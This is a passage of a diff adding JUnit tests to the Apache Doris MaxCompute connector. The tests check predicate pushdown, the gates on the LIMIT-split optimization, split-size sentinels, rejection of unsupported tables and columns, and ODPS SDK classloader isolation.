unknown column must be dropped, not pushed malformed"); + } + + @Test + public void testUnknownColumnInListDropsPredicate() { + ConnectorIn in = new ConnectorIn( + new ConnectorColumnRef("ghost", ConnectorType.of("INT")), + Arrays.asList(ConnectorLiteral.ofLong(1), ConnectorLiteral.ofLong(2)), + false); + Predicate p = converter(true, UTC).convert(in); + Assertions.assertSame(Predicate.NO_PREDICATE, p, + "an IN predicate on an unknown column must be dropped, not pushed malformed"); + } + + @Test + public void testKnownColumnComparisonStillPushed() { + // Regression guard: the get()!=null path is unaffected — a known column still pushes down. + ConnectorComparison cmp = new ConnectorComparison(ConnectorComparison.Operator.EQ, + new ConnectorColumnRef("id", ConnectorType.of("INT")), ConnectorLiteral.ofLong(5)); + Predicate p = converter(true, UTC).convert(cmp); + Assertions.assertNotSame(Predicate.NO_PREDICATE, p); + Assertions.assertTrue(p.toString().contains("id"), + "a known-column predicate must still push down; got: " + p); + } +} diff --git a/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeScanPlanProviderTest.java b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeScanPlanProviderTest.java new file mode 100644 index 00000000000000..90d31938e7161b --- /dev/null +++ b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeScanPlanProviderTest.java @@ -0,0 +1,345 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.maxcompute; + +import org.apache.doris.connector.api.ConnectorType; +import org.apache.doris.connector.api.DorisConnectorException; +import org.apache.doris.connector.api.pushdown.ConnectorAnd; +import org.apache.doris.connector.api.pushdown.ConnectorColumnRef; +import org.apache.doris.connector.api.pushdown.ConnectorComparison; +import org.apache.doris.connector.api.pushdown.ConnectorExpression; +import org.apache.doris.connector.api.pushdown.ConnectorIn; +import org.apache.doris.connector.api.pushdown.ConnectorLiteral; +import org.apache.doris.connector.api.pushdown.ConnectorOr; + +import com.aliyun.odps.PartitionSpec; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Arrays; +import java.util.Collections; +import java.util.HashMap; +import java.util.HashSet; +import java.util.List; +import java.util.Map; +import java.util.Optional; +import java.util.Set; + +/** + * Guards {@link MaxComputeScanPlanProvider}'s pure helpers (the connector module has no + * fe-core / Mockito, so these are exercised directly with no network or live ODPS). + * + *

Two concerns:

+ *
    + *
  • {@code toPartitionSpecs} — FIX-PRUNE-PUSHDOWN (DG-1): the bridge that turns the engine's + * pruned partition names into ODPS {@link PartitionSpec}s fed to the read session.
  • + *
  • {@code isLimitOptEnabled} / {@code shouldUseLimitOptimization} / + * {@code checkOnlyPartitionEquality} — FIX-LIMIT-SPLIT-DEFAULT (P3-9 / NG-5): the restored + * default-OFF three-gate for the LIMIT-split optimization, mirroring legacy + * {@code MaxComputeScanNode}'s {@code enableMcLimitSplitOptimization && + * onlyPartitionEqualityPredicate && hasLimit()}. Why this matters: the optimization + * collapses the scan into a single row-offset split, so it must fire ONLY when the user + * opted in AND every row in the (pruned) partitions qualifies (no filter, or pure + * partition-column equality) — otherwise it would silently change query planning and, on a + * residual row-level filter, under-read.
  • + *
+ */ +public class MaxComputeScanPlanProviderTest { + + // Literal var-name key — intentionally NOT the prod constant, so a prod-side typo in + // MaxComputeScanPlanProvider.ENABLE_MC_LIMIT_SPLIT_OPTIMIZATION (or drift from + // SessionVariable.ENABLE_MC_LIMIT_SPLIT_OPTIMIZATION) is caught here. + private static final String VAR_KEY = "enable_mc_limit_split_optimization"; + + private static final Set PART_COLS = new HashSet<>(Arrays.asList("pt", "region")); + + private static ConnectorColumnRef col(String name) { + return new ConnectorColumnRef(name, ConnectorType.of("INT")); + } + + private static ConnectorComparison eq(ConnectorExpression left, ConnectorExpression right) { + return new ConnectorComparison(ConnectorComparison.Operator.EQ, left, right); + } + + // ---- toPartitionSpecs (FIX-PRUNE-PUSHDOWN) ---- + + @Test + public void testNullInputMeansScanAll() { + Assertions.assertTrue(MaxComputeScanPlanProvider.toPartitionSpecs(null).isEmpty()); + } + + @Test + public void testEmptyInputMeansScanAll() { + Assertions.assertTrue( + MaxComputeScanPlanProvider.toPartitionSpecs(Collections.emptyList()).isEmpty()); + } + + @Test + public void testConvertsPartitionNamesToSpecs() { + List specs = MaxComputeScanPlanProvider.toPartitionSpecs( + Arrays.asList("pt=1", "pt=2,region=cn")); + + Assertions.assertEquals(2, specs.size()); + + PartitionSpec single = specs.get(0); + Assertions.assertEquals(Collections.singleton("pt"), single.keys()); + Assertions.assertEquals("1", single.get("pt")); + + PartitionSpec multi = specs.get(1); + Assertions.assertEquals("2", multi.get("pt")); + Assertions.assertEquals("cn", multi.get("region")); + } + + // ---- isLimitOptEnabled — gate (1): session var, default OFF ---- + + @Test + public void testLimitOptDisabledWhenVarAbsent() { + // No SET → var not in the session-property map → default OFF (legacy default). + Assertions.assertFalse(MaxComputeScanPlanProvider.isLimitOptEnabled(new HashMap<>())); + } + + @Test + public void testLimitOptEnabledWhenVarTrue() { + Map props = new HashMap<>(); + props.put(VAR_KEY, "true"); + Assertions.assertTrue(MaxComputeScanPlanProvider.isLimitOptEnabled(props)); + } + + @Test + public void testLimitOptDisabledWhenVarFalse() { + Map props = new HashMap<>(); + props.put(VAR_KEY, "false"); + Assertions.assertFalse(MaxComputeScanPlanProvider.isLimitOptEnabled(props)); + } + + // ---- shouldUseLimitOptimization — gate composition ---- + + @Test + public void testGateClosedWhenVarDisabled() { + // Gate (1) off: even with a LIMIT and no filter, the opt stays off. + Assertions.assertFalse(MaxComputeScanPlanProvider.shouldUseLimitOptimization( + false, 10, Optional.empty(), PART_COLS)); + } + + @Test + public void testGateClosedWhenNoLimit() { + // Gate (3) off: enabled var but limit <= 0. + Assertions.assertFalse(MaxComputeScanPlanProvider.shouldUseLimitOptimization( + true, 0, Optional.empty(), PART_COLS)); + } + + @Test + public void testGateOpenWhenEnabledLimitAndNoFilter() { + // Enabled + LIMIT + no predicate → every row qualifies → eligible. + Assertions.assertTrue(MaxComputeScanPlanProvider.shouldUseLimitOptimization( + true, 10, Optional.empty(), PART_COLS)); + } + + @Test + public void testGateOpenWhenEnabledLimitAndPartitionEquality() { + ConnectorExpression filter = eq(col("pt"), ConnectorLiteral.ofInt(1)); + Assertions.assertTrue(MaxComputeScanPlanProvider.shouldUseLimitOptimization( + true, 10, Optional.of(filter), PART_COLS)); + } + + @Test + public void testGateClosedWhenEnabledLimitButNonPartitionFilter() { + ConnectorExpression filter = eq(col("data_col"), ConnectorLiteral.ofInt(5)); + Assertions.assertFalse(MaxComputeScanPlanProvider.shouldUseLimitOptimization( + true, 10, Optional.of(filter), PART_COLS)); + } + + // ---- checkOnlyPartitionEquality — gate (2): predicate shapes ---- + + @Test + public void testSinglePartitionEqualityEligible() { + ConnectorExpression filter = eq(col("pt"), ConnectorLiteral.ofInt(1)); + Assertions.assertTrue( + MaxComputeScanPlanProvider.checkOnlyPartitionEquality(filter, PART_COLS)); + } + + @Test + public void testPartitionInListEligible() { + ConnectorExpression filter = new ConnectorIn(col("region"), + Arrays.asList(ConnectorLiteral.ofString("cn"), ConnectorLiteral.ofString("us")), + false); + Assertions.assertTrue( + MaxComputeScanPlanProvider.checkOnlyPartitionEquality(filter, PART_COLS)); + } + + @Test + public void testAndOfPartitionEqualitiesEligible() { + ConnectorExpression filter = new ConnectorAnd(Arrays.asList( + eq(col("pt"), ConnectorLiteral.ofInt(1)), + eq(col("region"), ConnectorLiteral.ofString("cn")))); + Assertions.assertTrue( + MaxComputeScanPlanProvider.checkOnlyPartitionEquality(filter, PART_COLS)); + } + + @Test + public void testAndWithNonPartitionConjunctIneligible() { + // One conjunct on a data column → the whole AND is ineligible (legacy parity). + ConnectorExpression filter = new ConnectorAnd(Arrays.asList( + eq(col("pt"), ConnectorLiteral.ofInt(1)), + eq(col("data_col"), ConnectorLiteral.ofInt(5)))); + Assertions.assertFalse( + MaxComputeScanPlanProvider.checkOnlyPartitionEquality(filter, PART_COLS)); + } + + @Test + public void testDataColumnEqualityIneligible() { + ConnectorExpression filter = eq(col("data_col"), ConnectorLiteral.ofInt(5)); + Assertions.assertFalse( + MaxComputeScanPlanProvider.checkOnlyPartitionEquality(filter, PART_COLS)); + } + + @Test + public void testNonEqOperatorOnPartitionIneligible() { + ConnectorExpression filter = new ConnectorComparison( + ConnectorComparison.Operator.GT, col("pt"), ConnectorLiteral.ofInt(1)); + Assertions.assertFalse( + MaxComputeScanPlanProvider.checkOnlyPartitionEquality(filter, PART_COLS)); + } + + @Test + public void testNotInOnPartitionIneligible() { + ConnectorExpression filter = new ConnectorIn(col("pt"), + Arrays.asList(ConnectorLiteral.ofInt(1), ConnectorLiteral.ofInt(2)), + true); + Assertions.assertFalse( + MaxComputeScanPlanProvider.checkOnlyPartitionEquality(filter, PART_COLS)); + } + + @Test + public void testInWithNonLiteralElementIneligible() { + ConnectorExpression filter = new ConnectorIn(col("pt"), + Arrays.asList(ConnectorLiteral.ofInt(1), col("region")), + false); + Assertions.assertFalse( + MaxComputeScanPlanProvider.checkOnlyPartitionEquality(filter, PART_COLS)); + } + + @Test + public void testLiteralOnLeftIneligible() { + // Mirror legacy: only `col = literal`, not `literal = col`. + ConnectorExpression filter = eq(ConnectorLiteral.ofInt(1), col("pt")); + Assertions.assertFalse( + MaxComputeScanPlanProvider.checkOnlyPartitionEquality(filter, PART_COLS)); + } + + @Test + public void testPartitionColumnEqualsPartitionColumnIneligible() { + // `pt = region`: left is a valid partition col-ref (reaches the RHS check), but the RHS + // is a column-ref, not a literal → ineligible. Guards the right-side literal check + // (legacy MaxComputeScanNode:346 requires child(1) instanceof LiteralExpr). + ConnectorExpression filter = eq(col("pt"), col("region")); + Assertions.assertFalse( + MaxComputeScanPlanProvider.checkOnlyPartitionEquality(filter, PART_COLS)); + } + + @Test + public void testInValueDataColumnIneligible() { + // `data_col IN ('a','b')`: the IN value column is NOT a partition column → ineligible. + // Guards the IN-value partition-column check (legacy MaxComputeScanNode:358-364 requires + // child(0) be a partition-column SlotRef). Without this guard a residual data-column IN + // filter would wrongly enable the single-split row-offset path and silently under-read. + ConnectorExpression filter = new ConnectorIn(col("data_col"), + Arrays.asList(ConnectorLiteral.ofString("a"), ConnectorLiteral.ofString("b")), + false); + Assertions.assertFalse( + MaxComputeScanPlanProvider.checkOnlyPartitionEquality(filter, PART_COLS)); + } + + @Test + public void testEqForNullOnPartitionIneligible() { + // `pt <=> 1` (EQ_FOR_NULL): only plain EQ is eligible (legacy requires Operator.EQ). + ConnectorExpression filter = new ConnectorComparison( + ConnectorComparison.Operator.EQ_FOR_NULL, col("pt"), ConnectorLiteral.ofInt(1)); + Assertions.assertFalse( + MaxComputeScanPlanProvider.checkOnlyPartitionEquality(filter, PART_COLS)); + } + + @Test + public void testBothLiteralsComparisonIneligible() { + // `1 = 2`: left is not a column-ref → ineligible. + ConnectorExpression filter = eq(ConnectorLiteral.ofInt(1), ConnectorLiteral.ofInt(2)); + Assertions.assertFalse( + MaxComputeScanPlanProvider.checkOnlyPartitionEquality(filter, PART_COLS)); + } + + @Test + public void testAndContainingNonLeafConjunctIneligible() { + // `pt=1 AND (pt=1 OR region='cn')`: the OR conjunct is neither a comparison nor an IN → + // isPartitionEqualityLeaf rejects it → the whole AND is ineligible. + ConnectorExpression or = new ConnectorOr(Arrays.asList( + eq(col("pt"), ConnectorLiteral.ofInt(1)), + eq(col("region"), ConnectorLiteral.ofString("cn")))); + ConnectorExpression filter = new ConnectorAnd(Arrays.asList( + eq(col("pt"), ConnectorLiteral.ofInt(1)), or)); + Assertions.assertFalse( + MaxComputeScanPlanProvider.checkOnlyPartitionEquality(filter, PART_COLS)); + } + + @Test + public void testEmptyInListMatchesLegacyEligible() { + // `pt IN ()` on a partition column → eligible (the all-literal loop is vacuously true). + // Mirrors legacy MaxComputeScanNode:365 (its literal loop is also vacuous on an empty + // list). Unreachable in practice — Nereids folds an empty IN to FALSE before pushdown — + // and the converted filterPredicate is still applied to the read session as a backstop. + // Pinned to document the deliberate legacy-parity choice. + ConnectorExpression filter = new ConnectorIn(col("pt"), + Collections.emptyList(), false); + Assertions.assertTrue( + MaxComputeScanPlanProvider.checkOnlyPartitionEquality(filter, PART_COLS)); + } + + // ---- reject reading ODPS external tables / logical views ---- + // Migrated from MaxComputeScanNode.getSplits / MaxComputeScanNodeTest (PR apache/doris#64119). + // planScan now gates via MaxComputeTableHandle.checkOperationSupported("Reading") before any + // split generation; the ODPS Storage API cannot scan external tables or logical views. The guard + // is exercised directly here (the connector test module has no Mockito to fake an ODPS Table). + + @Test + public void testReadRejectsOdpsExternalTable() { + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> MaxComputeTableHandle.checkOperationSupported( + true, false, "Reading", "default", "mc_external_table")); + Assertions.assertTrue(ex.getMessage().contains( + "Reading MaxCompute external table or logical view is not supported: " + + "default.mc_external_table"), + "got: " + ex.getMessage()); + } + + @Test + public void testReadRejectsOdpsLogicalView() { + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> MaxComputeTableHandle.checkOperationSupported( + false, true, "Reading", "default", "mc_logical_view")); + Assertions.assertTrue(ex.getMessage().contains( + "Reading MaxCompute external table or logical view is not supported: " + + "default.mc_logical_view"), + "got: " + ex.getMessage()); + } + + @Test + public void testReadAllowsManagedTable() { + // a normal (non-external, non-view) table must not be rejected (guards against over-rejection) + Assertions.assertDoesNotThrow(() -> MaxComputeTableHandle.checkOperationSupported( + false, false, "Reading", "default", "mc_managed_table")); + } +} diff --git a/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeScanRangeTest.java b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeScanRangeTest.java new file mode 100644 index 00000000000000..8c646f5f87aef7 --- /dev/null +++ b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeScanRangeTest.java @@ -0,0 +1,231 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.maxcompute; + +import org.apache.doris.connector.api.scan.ConnectorScanRange; +import org.apache.doris.thrift.TFileRangeDesc; +import org.apache.doris.thrift.TTableFormatFileDesc; + +import com.aliyun.odps.table.DataFormat; +import com.aliyun.odps.table.DataSchema; +import com.aliyun.odps.table.SessionStatus; +import com.aliyun.odps.table.TableIdentifier; +import com.aliyun.odps.table.read.TableBatchReadSession; +import com.aliyun.odps.table.read.split.InputSplit; +import com.aliyun.odps.table.read.split.InputSplitAssigner; +import com.aliyun.odps.table.read.split.impl.IndexedInputSplit; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.lang.reflect.Field; +import java.lang.reflect.Method; +import java.util.List; + +/** + * FIX-READ-SPLIT (P4-T06d) — guards the BYTE_SIZE split-size sentinel produced by + * {@link MaxComputeScanPlanProvider}'s byte_size branch. + * + *

WHY this matters: BE has no {@code split_type} field on the wire — it classifies a + * MaxCompute split purely by the numeric {@code split_size} it receives. {@code MaxComputeJniScanner} + * does {@code if (splitSize == -1) BYTE_SIZE else ROW_OFFSET} (MaxComputeJniScanner.java:125-128), + * then in {@code open()} builds {@code IndexedInputSplit} (BYTE_SIZE) or + * {@code RowRangeInputSplit(sessionId, startOffset, splitSize)} (ROW_OFFSET). If a byte_size split + * carries a real byte count (e.g. 268435456) instead of {@code -1}, BE silently mis-reads it as a + * ROW_OFFSET split and returns CORRUPT data (no error). So the provider's byte_size branch MUST emit + * size {@code -1}; this mirrors legacy {@code MaxComputeScanNode}'s + * {@code MaxComputeSplit(..., length=-1, fileLength=splitByteSize, ...)}.

+ * + *

This test drives the PROVIDER's real byte_size split-building code + * ({@code buildSplitsFromSession}) with offline fakes (no network, no live ODPS) — so it locks the + * provider's CHOICE of {@code -1}, not merely the range mechanism. Reverting the byte_size branch to + * {@code .length(splitByteSize)} makes {@code byteSizeBranchEmitsMinusOneSizeSentinel} FAIL + * (getSize() would become the real byte size). The row_offset case is the contrast that proves only + * byte_size uses the sentinel — its size is the real row count, never {@code -1}.

+ * + *

The connector module has no fe-core / Mockito; we reach the private split-building method via + * reflection and stub the ODPS {@code TableBatchReadSession} / {@code InputSplitAssigner} with plain + * Serializable fakes ({@code serializeSession} writes the session, so it must be Serializable).

+ */ +public class MaxComputeScanRangeTest { + + private static final long SPLIT_BYTE_SIZE = 268435456L; // ODPS default byte-size split + + @Test + public void byteSizeBranchEmitsMinusOneSizeSentinel() throws Exception { + // Build via the provider's REAL byte_size branch. + ConnectorScanRange range = buildSingleRange( + MCConnectorProperties.SPLIT_BY_BYTE_SIZE_STRATEGY, + new FakeSession(new FakeAssigner(SplitKind.BYTE_SIZE))); + + TFileRangeDesc rangeDesc = populate(range); + + // The whole point of the fix: BE distinguishes BYTE_SIZE from ROW_OFFSET by size == -1. + // If the provider reverts to .length(splitByteSize) this assertion fails with 268435456, + // which is exactly the corrupt-read bug (BE would treat it as ROW_OFFSET row count). + Assertions.assertEquals(-1L, rangeDesc.getSize(), + "byte_size split must carry size == -1 sentinel; any real byte count makes BE " + + "mis-classify it as ROW_OFFSET and read corrupt data"); + // start is the split index (set by the byte_size branch), unaffected by the sentinel. + Assertions.assertEquals(7L, rangeDesc.getStartOffset(), + "byte_size split start must be the IndexedInputSplit splitIndex"); + // path mirrors legacy "[ splitIndex , -1 ]". + Assertions.assertEquals("[ 7 , -1 ]", rangeDesc.getPath(), + "byte_size split path must mirror legacy '[ splitIndex , -1 ]'"); + } + + @Test + public void rowOffsetBranchKeepsRealRowCount() throws Exception { + // Contrast: the row_offset branch must NOT use the sentinel; it sends the real row count + // so BE builds RowRangeInputSplit(sessionId, startOffset, splitSize). This locks the intent + // that ONLY byte_size uses -1 — guarding against an over-broad "set everything to -1" fix. + ConnectorScanRange range = buildSingleRange( + MCConnectorProperties.SPLIT_BY_ROW_COUNT_STRATEGY, + new FakeSession(new FakeAssigner(SplitKind.ROW_OFFSET))); + + TFileRangeDesc rangeDesc = populate(range); + + Assertions.assertEquals(FakeAssigner.ROW_COUNT, rangeDesc.getSize(), + "row_offset split must carry the real row count (BE reads it as RowRangeInputSplit " + + "size), never the -1 byte_size sentinel"); + } + + /** + * Invokes the provider's private {@code buildSplitsFromSession} (which contains the byte_size / + * row_offset branches under test) with a stubbed session, returning the single produced range. + */ + private static ConnectorScanRange buildSingleRange(String strategy, TableBatchReadSession session) + throws Exception { + MaxComputeScanPlanProvider provider = newUninitializedProvider(); + setField(provider, "splitStrategy", strategy); + setField(provider, "splitByteSize", SPLIT_BYTE_SIZE); + setField(provider, "splitRowCount", FakeAssigner.ROW_COUNT); + setField(provider, "readTimeout", 120); + setField(provider, "connectTimeout", 10); + setField(provider, "retryTimes", 4); + + Method m = MaxComputeScanPlanProvider.class.getDeclaredMethod( + "buildSplitsFromSession", TableBatchReadSession.class, com.aliyun.odps.Table.class); + m.setAccessible(true); + @SuppressWarnings("unchecked") + List ranges = + (List) m.invoke(provider, session, null); + Assertions.assertEquals(1, ranges.size(), "fake assigner yields exactly one split"); + return ranges.get(0); + } + + /** Constructs the provider without running ctor logic / property init (we set fields directly). */ + private static MaxComputeScanPlanProvider newUninitializedProvider() throws Exception { + // The ctor only stores the connector reference; buildSplitsFromSession never touches it. + return new MaxComputeScanPlanProvider(null); + } + + private static TFileRangeDesc populate(ConnectorScanRange range) { + TTableFormatFileDesc formatDesc = new TTableFormatFileDesc(); + TFileRangeDesc rangeDesc = new TFileRangeDesc(); + range.populateRangeParams(formatDesc, rangeDesc); + return rangeDesc; + } + + private static void setField(Object target, String name, Object value) throws Exception { + Field f = MaxComputeScanPlanProvider.class.getDeclaredField(name); + f.setAccessible(true); + f.set(target, value); + } + + private enum SplitKind { BYTE_SIZE, ROW_OFFSET } + + /** Serializable stub session — {@code serializeSession} writes it, so it must serialize. */ + private static final class FakeSession implements TableBatchReadSession { + private static final long serialVersionUID = 1L; + private final transient InputSplitAssigner assigner; + + FakeSession(InputSplitAssigner assigner) { + this.assigner = assigner; + } + + // The only method the split-building path under test actually calls. + @Override + public InputSplitAssigner getInputSplitAssigner() { + return assigner; + } + + // Remaining abstract methods are never reached at plan time (read/reader paths only). + @Override + public DataSchema readSchema() { + throw new UnsupportedOperationException("not used in plan-time test"); + } + + @Override + public boolean supportsDataFormat(DataFormat dataFormat) { + throw new UnsupportedOperationException("not used in plan-time test"); + } + + @Override + public String toJson() { + throw new UnsupportedOperationException("not used in plan-time test"); + } + + @Override + public String getId() { + return FakeAssigner.SESSION_ID; + } + + @Override + public TableIdentifier getTableIdentifier() { + throw new UnsupportedOperationException("not used in plan-time test"); + } + + @Override + public SessionStatus getStatus() { + throw new UnsupportedOperationException("not used in plan-time test"); + } + } + + /** Stub assigner producing one split of the requested kind. */ + private static final class FakeAssigner implements InputSplitAssigner { + private static final long serialVersionUID = 1L; + static final String SESSION_ID = "fake-session"; + static final long ROW_COUNT = 1000L; + private final SplitKind kind; + + FakeAssigner(SplitKind kind) { + this.kind = kind; + } + + @Override + public int getSplitsCount() { + return 1; + } + + @Override + public InputSplit[] getAllSplits() { + // BYTE_SIZE branch casts to IndexedInputSplit and reads getSplitIndex(). + return new InputSplit[] {new IndexedInputSplit(SESSION_ID, 7)}; + } + + @Override + public long getTotalRowCount() { + return ROW_COUNT; // one split: offset 0, count ROW_COUNT + } + + @Override + public InputSplit getSplitByRowOffset(long offset, long count) { + return new IndexedInputSplit(SESSION_ID, (int) offset); + } + } +} diff --git a/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeValidateColumnsTest.java b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeValidateColumnsTest.java new file mode 100644 index 00000000000000..649085c76ab35b --- /dev/null +++ b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeValidateColumnsTest.java @@ -0,0 +1,107 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.maxcompute; + +import org.apache.doris.connector.api.ConnectorColumn; +import org.apache.doris.connector.api.ConnectorType; +import org.apache.doris.connector.api.DorisConnectorException; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; + +/** + * Pins that MaxCompute CREATE TABLE rejects columns it cannot store: AUTO_INCREMENT + * (P2-8 FIX-AUTOINC-REJECT) and aggregate columns like SUM (G5 FIX-AGG-COLUMN-REJECT), + * mirroring legacy MaxComputeMetadataOps.validateColumns:422-429. + * + *

WHY this matters: MaxCompute cannot store auto-increment columns. Legacy + * {@code MaxComputeMetadataOps.validateColumns:422-425} threw a clear error; after the SPI + * cutover the flag was dropped silently (the {@code ConnectorColumn} carrier had no + * {@code isAutoInc} field), so {@code CREATE TABLE (id INT AUTO_INCREMENT)} silently created a + * plain column — a data-model regression where the user's intent vanishes without warning. This + * fix re-carries the flag and re-rejects it connector-side. These tests lock that in.

+ * + *

{@code validateColumns} is package-private (reached only via {@code createTable} in + * production, which needs a live ODPS handle); this connector test module has no Mockito, so the + * test constructs the metadata offline with {@code null} odps/structureHelper and calls + * {@code validateColumns} directly — it dereferences neither (only the static + * {@code MCTypeMapping.toMcType}). Same offline idiom as {@link MaxComputeBuildTableDescriptorTest}.

+ */ +public class MaxComputeValidateColumnsTest { + + private MaxComputeConnectorMetadata metadata() { + return new MaxComputeConnectorMetadata( + null, null, "proj", "ep", "quota", Collections.emptyMap()); + } + + @Test + public void autoIncColumnIsRejected() { + ConnectorColumn autoInc = new ConnectorColumn( + "id", ConnectorType.of("INT"), "", false, null, false, true); + + // WHY (Rule 9): silent acceptance drops the user's AUTO_INCREMENT intent (MaxCompute can't + // store it); legacy rejected it loudly. MUTATION: removing the `if (col.isAutoInc()) throw` + // block makes this go red (no exception). + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> metadata().validateColumns(Collections.singletonList(autoInc))); + Assertions.assertTrue( + ex.getMessage().contains("Auto-increment columns are not supported for MaxCompute tables: id"), + "rejection message must name the offending column, mirroring legacy validateColumns"); + } + + @Test + public void nonAutoIncColumnPasses() { + ConnectorColumn plain = new ConnectorColumn( + "id", ConnectorType.of("INT"), "", false, null, false, false); + + // WHY: guards against over-rejection -- a normal column must still validate; the gate must + // key on the auto-inc flag, not reject every column. + Assertions.assertDoesNotThrow( + () -> metadata().validateColumns(Collections.singletonList(plain))); + } + + @Test + public void aggregatedColumnIsRejected() { + ConnectorColumn aggregated = new ConnectorColumn( + "c", ConnectorType.of("INT"), "", false, null, false, false, true); + + // WHY (Rule 9): MaxCompute has no aggregate-key model; legacy + // MaxComputeMetadataOps.validateColumns:426-429 rejected aggregate columns loudly. The + // nereids non-OLAP path does not (validateKeyColumns is ENGINE_OLAP-gated), so silent + // acceptance drops the user's aggregate intent to a plain column. MUTATION: removing the + // `if (col.isAggregated()) throw` block makes this go red (no exception). + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> metadata().validateColumns(Collections.singletonList(aggregated))); + Assertions.assertTrue( + ex.getMessage().contains("Aggregation columns are not supported for MaxCompute tables: c"), + "rejection message must name the offending column, mirroring legacy validateColumns"); + } + + @Test + public void nonAggregatedColumnPasses() { + ConnectorColumn plain = new ConnectorColumn( + "c", ConnectorType.of("INT"), "", false, null, false, false, false); + + // WHY: guards against over-rejection -- a normal column must still validate; the gate must + // key on the isAggregated flag, not reject every column. + Assertions.assertDoesNotThrow( + () -> metadata().validateColumns(Collections.singletonList(plain))); + } +} diff --git a/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/OdpsClassloaderIsolationTest.java b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/OdpsClassloaderIsolationTest.java new file mode 100644 index 00000000000000..9776681008d718 --- /dev/null +++ b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/OdpsClassloaderIsolationTest.java @@ -0,0 +1,151 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.maxcompute; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.io.File; +import java.lang.reflect.Method; +import java.net.URL; +import java.net.URLClassLoader; +import java.util.ArrayList; +import java.util.HashMap; +import java.util.List; +import java.util.Map; + +/** + * R-004 part 1 — defensive test that the ODPS SDK loads and constructs an Odps client when the + * MaxCompute connector is loaded under an isolated, child-first class loader (no credentials, no + * network, CI-runnable). + * + *

In production the connector runs inside {@code ConnectorPluginManager}'s plugin isolation, + * where {@code org.apache.doris.connector.} / {@code org.apache.doris.filesystem.} are parent-first + * (the shared SPI) while the connector impl and its third-party deps — including the ODPS SDK + * ({@code com.aliyun.odps.*}) — load child-first, getting an isolated copy per plugin. Risk R-004 is + * that loading the ODPS SDK in such isolation breaks (NoClassDefFoundError / ClassCastException) or + * that a per-plugin SDK copy poisons a process-wide singleton.

+ * + *

This test reproduces the risk with a deliberately stricter loader: everything outside the JDK + * is child-first, so the connector class and the whole ODPS SDK are defined by the isolated loader. + * That is a superset of production isolation for the SDK, so passing here covers the production + * policy. It asserts: (1) two isolated loaders define distinct connector classes (no shared static + * state across plugins); (2) {@code createClient} builds an {@code Odps} under isolation with no + * linkage error; (3) the SDK class is defined by the isolated loader, not leaked from the app loader; + * (4) the SDK class differs across loaders (isolated, not a shared singleton).

